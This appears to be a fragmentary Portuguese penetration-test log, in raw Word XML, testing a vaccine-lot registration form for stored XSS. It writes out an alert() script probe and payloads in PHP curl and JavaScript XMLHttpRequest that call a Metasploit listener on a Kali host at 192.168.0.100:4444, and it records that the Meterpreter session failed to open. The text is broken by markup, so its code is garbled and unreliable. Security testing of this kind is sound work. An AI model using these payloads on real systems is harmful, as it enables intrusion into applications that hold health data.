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Teste realizado dia 23-04-16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XSS - Cadastro de lotes.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 40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1 h e 10 min.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os inputs da tela de cadastro de lotes de vacina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descobrir se eles são vulneráveis ao ataque XSS Armazenado.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XSS armazenado é aquele tipo de ataque onde o código malicioso fica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armazenado no banco da aplicação e é carregado junto com os dados normais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 tela no momento do processamento da página. Como não são tratados, instruções javascript conseguem ser enviadas ao navegador.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Cadastrar 1 dos campos com o seguinte código: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&lt;script&gt; alert(“oi”);&lt;/script&gt; no campo Marca/Fabricante.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os dados não forem tratados, quando forem carregados do banco o código acima deve produzir um pop-up dizendo “oi”.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41800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Abrir uma conexão do sistema de vacinas com a máquina do kali num listener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metasploit para ganhar acesso ao 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o metasploit para abrir um listener na porta 444 da vm onde o kali está hospedado. Usando o eploit disponivel em Exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/Multi/Handler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um comando GET de javascript para abrir a conexão da máquina do sistema com a vm do kali na porta indicada.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comando a ser colocado no XSS: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$curl = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl_init(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'http://192.168.0.100:4444'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curl_exec($curl);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curl_close($curl);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o código acima funcione, a ideia é que o script do lado do servidor abra uma conexão com o listener do Metasploit que está ouvindo.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Resultado:  A sessão do meterpreter não foi aberta.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Alterar o script anterior para tentar descobrir o que houve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$curl = curl_init('http://192.168.0.100:4444');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if(!curl_exec($curl)){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javascript:alert(curl_error($curl));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Não consegui executar o script pois o tamanho do campo na coluna é pequeno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 estourou um erro no banco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Realizar um get via javascript normal com o mesmo fim.(sem os espaços)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&lt;script&gt;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 = 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(); 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r.open(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4a1c21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear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,’http://192.168.0.100:4444’,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220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181a1c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.send();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a737c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8b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="eff0f1" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A sessão do meterpreter não foi aberta.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